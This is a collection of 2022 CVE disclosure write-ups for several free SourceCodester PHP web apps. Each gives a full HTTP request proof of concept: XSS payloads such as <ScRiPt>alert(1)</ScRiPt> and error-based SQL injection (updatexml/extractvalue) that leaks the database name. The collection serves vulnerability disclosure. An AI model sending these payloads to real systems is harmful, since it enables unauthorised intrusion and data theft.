Covid-19 Travel Pass Management System v1.0 is vulnerable to Cross Site Scripting (XSS) via /ctpms/classes/Users.php?f=save, firstname.

Permalink

**covid-19-travel-pass-management-system v1.0 - Cross-site Scripting (XSS)**

vendors: https://www.sourcecodester.com/php/15308/covid-19-travel-pass-management-system-phpoop-free-source-code.html

Date: 2022-05-07

Vulnerability File: /ctpms/classes/Users.php?f=save

Vulnerability location: /ctpms/classes/Users.php?f=save, firstname

\[+\] Payload: <sCrIpT>alert(1)</sCrIpT>

Tested on Windows 10, XAMPP

    POST /ctpms/classes/Users.php?f=save HTTP/1.1
    Host: 192.168.2.106
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    X-Requested-With: XMLHttpRequest
    Content-Type: multipart/form-data; boundary=---------------------------3611536016190209454970609370
    Content-Length: 1036
    Origin: http://192.168.2.106
    Connection: keep-alive
    Referer: http://192.168.2.106/ctpms/admin/?page=user/manage_user&id=7
    Cookie: PHPSESSID=0389fublnj7ggho8q04fuvfaqe
    
    -----------------------------3611536016190209454970609370
    Content-Disposition: form-data; name="id"
    
    7
    -----------------------------3611536016190209454970609370
    Content-Disposition: form-data; name="firstname"
    
    <ScRiPt>alert(1)</ScRiPt>
    -----------------------------3611536016190209454970609370
    Content-Disposition: form-data; name="middlename"
    
    dgfd
    -----------------------------3611536016190209454970609370
    Content-Disposition: form-data; name="lastname"
    
    gfdf
    -----------------------------3611536016190209454970609370
    Content-Disposition: form-data; name="username"
    
    gdf
    -----------------------------3611536016190209454970609370
    Content-Disposition: form-data; name="password"
    
    
    -----------------------------3611536016190209454970609370
    Content-Disposition: form-data; name="type"
    
    1
    -----------------------------3611536016190209454970609370
    Content-Disposition: form-data; name="img"; filename=""
    Content-Type: application/octet-stream
    
    
    -----------------------------3611536016190209454970609370--

CVE-2022-30842: bug_report_CVE/xss.md at main · mikeccltt/bug_report_CVE

Room-rent-portal-site v1.0 is vulnerable to SQL Injection via /rrps/classes/Master.php?f=delete_category, id.

Permalink

**room-rent-portal-site v1.0 has SQL injection**

vendors: https://www.sourcecodester.com/php/15301/room-rent-portal-site-phpoop-free-source-code.html

Date: 2022-05-07

Vulnerability File: /rrps/classes/Master.php?f=delete\_category

Vulnerability location:/rrps/classes/Master.php?f=delete\_category, id

\[+\] Payload: 2'and/\*\*/extractvalue(1,concat(char(126),database()))and'

Tested on Windows 10, XAMPP

    POST http://192.168.2.106/rrps/classes/Master.php?f=delete_category HTTP/1.1
    Host: 192.168.2.106
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 60
    Origin: http://192.168.2.106
    Connection: keep-alive
    Referer: http://192.168.2.106/rrps/admin/?page=categories
    Cookie: PHPSESSID=h4hpbcj74nsiroalrkj8o2251s
    
    id=2'and/**/extractvalue(1,concat(char(126),database()))and'

CVE-2022-30843: bug_report_CVE/sql.md at main · mikeccltt/bug_report_CVE

Toll-tax-management-system v1.0 is vulnerable to Cross Site Scripting (XSS) via /ttms/classes/Master.php?f=save_recipient, vehicle_name.

Permalink

Cannot retrieve contributors at this time

**toll-tax-management-system v1.0 - Cross-site Scripting (XSS)**

vendors: https://www.sourcecodester.com/php/15304/toll-tax-management-system-phpoop-free-source-code.html

Date: 2022-05-07

Vulnerability File: /ttms/classes/Master.php?f=save\_recipient

Vulnerability location: /ttms/classes/Master.php?f=save\_recipient, vehicle\_name

\[+\] Payload: <sCrIpT>alert(1)</sCrIpT>

Tested on Windows 10, XAMPP

    POST /ttms/classes/Master.php?f=save_recipient HTTP/1.1
    Host: 192.168.2.106
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    X-Requested-With: XMLHttpRequest
    Content-Type: multipart/form-data; boundary=---------------------------24404946016694802869537324
    Content-Length: 870
    Origin: http://192.168.2.106
    Connection: keep-alive
    Referer: http://192.168.2.106/ttms/admin/?page=recipients/manage_recipient
    Cookie: PHPSESSID=0389fublnj7ggho8q04fuvfaqe
    
    -----------------------------24404946016694802869537324
    Content-Disposition: form-data; name="id"
    
    
    -----------------------------24404946016694802869537324
    Content-Disposition: form-data; name="category_id"
    
    2
    -----------------------------24404946016694802869537324
    Content-Disposition: form-data; name="toll_id"
    
    2
    -----------------------------24404946016694802869537324
    Content-Disposition: form-data; name="vehicle_name"
    
    <ScRiPt>alert(1)</ScRiPt>
    -----------------------------24404946016694802869537324
    Content-Disposition: form-data; name="vehicle_registration"
    
    asd
    -----------------------------24404946016694802869537324
    Content-Disposition: form-data; name="owner"
    
    asd
    -----------------------------24404946016694802869537324
    Content-Disposition: form-data; name="cost"
    
    100
    -----------------------------24404946016694802869537324--

CVE-2022-30837: bug_report_CVE/xss.md at main · mikeccltt/bug_report_CVE

ChatBot App with Suggestion in PHP/OOP v1.0 is vulnerable to Cross Site Scripting (XSS) via /simple_chat_bot/classes/Master.php?f=save_response.

Permalink

**chatbot-app-suggestion-phpoop v1.0 - Cross-site Scripting (XSS)**

vendors: https://www.sourcecodester.com/php/15316/chatbot-app-suggestion-phpoop-free-source-code.html

Date: 2022-05-07

Vulnerability File: /simple\_chat\_bot/classes/Master.php?f=save\_response

Vulnerability location: /simple\_chat\_bot/classes/Master.php?f=save\_response, keyword\[\]

\[+\] Payload: <sCrIpT>alert(1)</sCrIpT>

Tested on Windows 10, XAMPP

    POST /simple_chat_bot/classes/Master.php?f=save_response HTTP/1.1
    Host: 192.168.2.106
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    X-Requested-With: XMLHttpRequest
    Content-Type: multipart/form-data; boundary=---------------------------268132382818445192602306506330
    Content-Length: 1479
    Origin: http://192.168.2.106
    Connection: keep-alive
    Referer: http://192.168.2.106/simple_chat_bot/admin/?page=responses/manage_response&id=7
    Cookie: PHPSESSID=0389fublnj7ggho8q04fuvfaqe
    
    -----------------------------268132382818445192602306506330
    Content-Disposition: form-data; name="id"
    
    7
    -----------------------------268132382818445192602306506330
    Content-Disposition: form-data; name="response"
    
    <p>On this simple ChatBot Application, You can query anything and the system will automatically browse a response that is stored on this site.ï¿½</p><p>The queries fetch a response that has an equivalent keyword.</p><p>Also, the application consists of suggestion keywords to query.</p>
    -----------------------------268132382818445192602306506330
    Content-Disposition: form-data; name="files"; filename=""
    Content-Type: application/octet-stream
    
    
    -----------------------------268132382818445192602306506330
    Content-Disposition: form-data; name="status"
    
    1
    -----------------------------268132382818445192602306506330
    Content-Disposition: form-data; name="keyword[]"
    
    <ScRiPt>alert(1)</ScRiPt>
    -----------------------------268132382818445192602306506330
    Content-Disposition: form-data; name="suggestion[]"
    
    Hi
    -----------------------------268132382818445192602306506330
    Content-Disposition: form-data; name="suggestion[]"
    
    Hello
    -----------------------------268132382818445192602306506330
    Content-Disposition: form-data; name="suggestion[]"
    
    Hello There
    -----------------------------268132382818445192602306506330
    Content-Disposition: form-data; name="suggestion[]"
    
    
    -----------------------------268132382818445192602306506330--

CVE-2022-30464: chatbot/xss.md at main · mikeccltt/chatbot

Water-billing-management-system v1.0 is affected by: Cross Site Scripting (XSS) via /wbms/classes/Users.php?f=save, firstname.

Permalink

Cannot retrieve contributors at this time

**water-billing-management-system v1.0 - Cross-site Scripting (XSS)**

vendors: https://www.sourcecodester.com/php/15309/water-billing-management-system-phpoop-free-source-code.html

Date: 2022-05-07

Vulnerability File: /wbms/classes/Users.php?f=save

Vulnerability location: /wbms/classes/Users.php?f=save, firstname

\[+\] Payload: <sCrIpT>alert(1)</sCrIpT>

Tested on Windows 10, XAMPP

    POST /wbms/classes/Users.php?f=save HTTP/1.1
    Host: 192.168.2.106
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    X-Requested-With: XMLHttpRequest
    Content-Type: multipart/form-data; boundary=---------------------------41385014663807018218740876870
    Content-Length: 1045
    Origin: http://192.168.2.106
    Connection: keep-alive
    Referer: http://192.168.2.106/wbms/admin/?page=user/manage_user
    Cookie: PHPSESSID=0389fublnj7ggho8q04fuvfaqe
    
    -----------------------------41385014663807018218740876870
    Content-Disposition: form-data; name="id"
    
    
    -----------------------------41385014663807018218740876870
    Content-Disposition: form-data; name="firstname"
    
    <ScRiPt>alert(1)</ScRiPt>
    -----------------------------41385014663807018218740876870
    Content-Disposition: form-data; name="middlename"
    
    123
    -----------------------------41385014663807018218740876870
    Content-Disposition: form-data; name="lastname"
    
    234
    -----------------------------41385014663807018218740876870
    Content-Disposition: form-data; name="username"
    
    234
    -----------------------------41385014663807018218740876870
    Content-Disposition: form-data; name="password"
    
    234
    -----------------------------41385014663807018218740876870
    Content-Disposition: form-data; name="type"
    
    1
    -----------------------------41385014663807018218740876870
    Content-Disposition: form-data; name="img"; filename=""
    Content-Type: application/octet-stream
    
    
    -----------------------------41385014663807018218740876870--

CVE-2022-30462: wbms_bug_report/xss.md at main · mikeccltt/wbms_bug_report

Automotive Shop Management System v1.0 is vulnerable to SQL Injection via /asms/classes/Master.php?f=delete_product.

Permalink

Cannot retrieve contributors at this time

**Automotive Shop Management System v1.0 has SQL injection**

vendors: https://www.sourcecodester.com/php/15312/automotive-shop-management-system-phpoop-free-source-code.html

Date: 2022-05-07

Vulnerability File: /asms/classes/Master.php?f=delete\_product

Vulnerability location: /asms/classes/Master.php?f=delete\_product, id

\[+\] Payload: id=5' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

Tested on Windows 10, XAMPP

    POST /asms/classes/Master.php?f=delete_product HTTP/1.1
    Host: 192.168.2.106
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 65
    Origin: http://192.168.2.106
    Connection: keep-alive
    Referer: http://192.168.2.106/asms/admin/?page=products
    Cookie: PHPSESSID=0389fublnj7ggho8q04fuvfaqe
    
    id=5' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

CVE-2022-30463: automotive/sql.md at main · mikeccltt/automotive

Automotive Shop Management System v1.0 is vulnerable to Cross Site Scripting (XSS) via /asms/classes/Master.php?f=save_product, name.

Permalink

Cannot retrieve contributors at this time

**Automotive Shop Management System v1.0 - Cross-site Scripting (XSS)**

vendors: https://www.sourcecodester.com/php/15312/automotive-shop-management-system-phpoop-free-source-code.html

Date: 2022-05-07

Vulnerability File: /asms/classes/Master.php?f=save\_product

Vulnerability location: /asms/classes/Master.php?f=save\_product, name

\[+\] Payload: <sCrIpT>alert(1)</sCrIpT>

Tested on Windows 10, XAMPP

    POST /asms/classes/Master.php?f=save_product HTTP/1.1
    Host: 192.168.2.106
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    X-Requested-With: XMLHttpRequest
    Content-Type: multipart/form-data; boundary=---------------------------83960212638164850273547100712
    Content-Length: 835
    Origin: http://192.168.2.106
    Connection: keep-alive
    Referer: http://192.168.2.106/asms/admin/?page=products
    Cookie: PHPSESSID=0389fublnj7ggho8q04fuvfaqe
    
    -----------------------------83960212638164850273547100712
    Content-Disposition: form-data; name="id"
    
    5
    -----------------------------83960212638164850273547100712
    Content-Disposition: form-data; name="name"
    
    <ScRiPt>alert(1)</ScRiPt>
    -----------------------------83960212638164850273547100712
    Content-Disposition: form-data; name="description"
    
    <ScRiPt>alert(1)</ScRiPt>
    -----------------------------83960212638164850273547100712
    Content-Disposition: form-data; name="price"
    
    1100.00
    -----------------------------83960212638164850273547100712
    Content-Disposition: form-data; name="status"
    
    1
    -----------------------------83960212638164850273547100712
    Content-Disposition: form-data; name="img"; filename=""
    Content-Type: application/octet-stream
    
    
    -----------------------------83960212638164850273547100712--

CVE-2022-30458: automotive/xss.md at main · mikeccltt/automotive

Simple Social Networking Site v1.0 is vulnerable to Cross Site Scripting (XSS) via /sns/classes/Users.php?f=save, firstname.

Permalink

Cannot retrieve contributors at this time

**simple-social-networking-site-instagram v1.0 - Cross-site Scripting (XSS)**

vendors: https://www.sourcecodester.com/php/15311/simple-social-networking-site-instagram-phpoop-free-source-code.html

Date: 2022-05-07

Vulnerability File: /sns/classes/Users.php?f=save

Vulnerability location: /sns/classes/Users.php?f=save, firstname

\[+\] Payload: <sCrIpT>alert(1)</sCrIpT>

Tested on Windows 10, XAMPP

    POST /sns/classes/Users.php?f=save HTTP/1.1
    Host: 192.168.2.106
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    X-Requested-With: XMLHttpRequest
    Content-Type: multipart/form-data; boundary=---------------------------2778781845921125101691173168
    Content-Length: 1036
    Origin: http://192.168.2.106
    Connection: keep-alive
    Referer: http://192.168.2.106/sns/admin/?page=user/manage_user
    Cookie: PHPSESSID=0389fublnj7ggho8q04fuvfaqe
    
    -----------------------------2778781845921125101691173168
    Content-Disposition: form-data; name="id"
    
    
    -----------------------------2778781845921125101691173168
    Content-Disposition: form-data; name="firstname"
    
    <ScRiPt>alert(1)</ScRiPt>
    -----------------------------2778781845921125101691173168
    Content-Disposition: form-data; name="middlename"
    
    123
    -----------------------------2778781845921125101691173168
    Content-Disposition: form-data; name="lastname"
    
    123
    -----------------------------2778781845921125101691173168
    Content-Disposition: form-data; name="username"
    
    123
    -----------------------------2778781845921125101691173168
    Content-Disposition: form-data; name="password"
    
    123
    -----------------------------2778781845921125101691173168
    Content-Disposition: form-data; name="type"
    
    2
    -----------------------------2778781845921125101691173168
    Content-Disposition: form-data; name="img"; filename=""
    Content-Type: application/octet-stream
    
    
    -----------------------------2778781845921125101691173168--

CVE-2022-30460: sns_bug_report/xss.md at main · mikeccltt/sns_bug_report

ChatBot App with Suggestion in PHP/OOP v1.0 is vulnerable to SQL Injection via /simple_chat_bot/classes/Master.php?f=delete_response, id.

Permalink

**chatbot-app-suggestion-phpoop v1.0 has SQL injection**

vendors: https://www.sourcecodester.com/php/15316/chatbot-app-suggestion-phpoop-free-source-code.html

Date: 2022-05-07

Vulnerability File: /simple\_chat\_bot/classes/Master.php?f=delete\_response

Vulnerability location: /simple\_chat\_bot/classes/Master.php?f=delete\_response, id

\[+\] Payload: id=7' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

Tested on Windows 10, XAMPP

    POST /simple_chat_bot/classes/Master.php?f=delete_response HTTP/1.1
    Host: 192.168.2.106
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 65
    Origin: http://192.168.2.106
    Connection: keep-alive
    Referer: http://192.168.2.106/simple_chat_bot/admin/?page=responses
    Cookie: PHPSESSID=0389fublnj7ggho8q04fuvfaqe
    
    id=7' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

CVE-2022-30459: chatbot/sql.md at main · mikeccltt/chatbot

Water-billing-management-system v1.0 is vulnerable to SQL Injection via /wbms/classes/Master.php?f=delete_client, id

Permalink

**water-billing-management-system v1.0 has SQL injection**

vendors: https://www.sourcecodester.com/php/15309/water-billing-management-system-phpoop-free-source-code.html

Date: 2022-05-07

Vulnerability File: /wbms/classes/Master.php?f=delete\_client

Vulnerability location: /wbms/classes/Master.php?f=delete\_client, id

\[+\] Payload:id=2' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

Tested on Windows 10, XAMPP

    POST /wbms/classes/Master.php?f=delete_client HTTP/1.1
    Host: 192.168.2.106
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 65
    Origin: http://192.168.2.106
    Connection: keep-alive
    Referer: http://192.168.2.106/wbms/admin/?page=clients
    Cookie: PHPSESSID=0389fublnj7ggho8q04fuvfaqe
    
    id=2' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

Tag

#firefox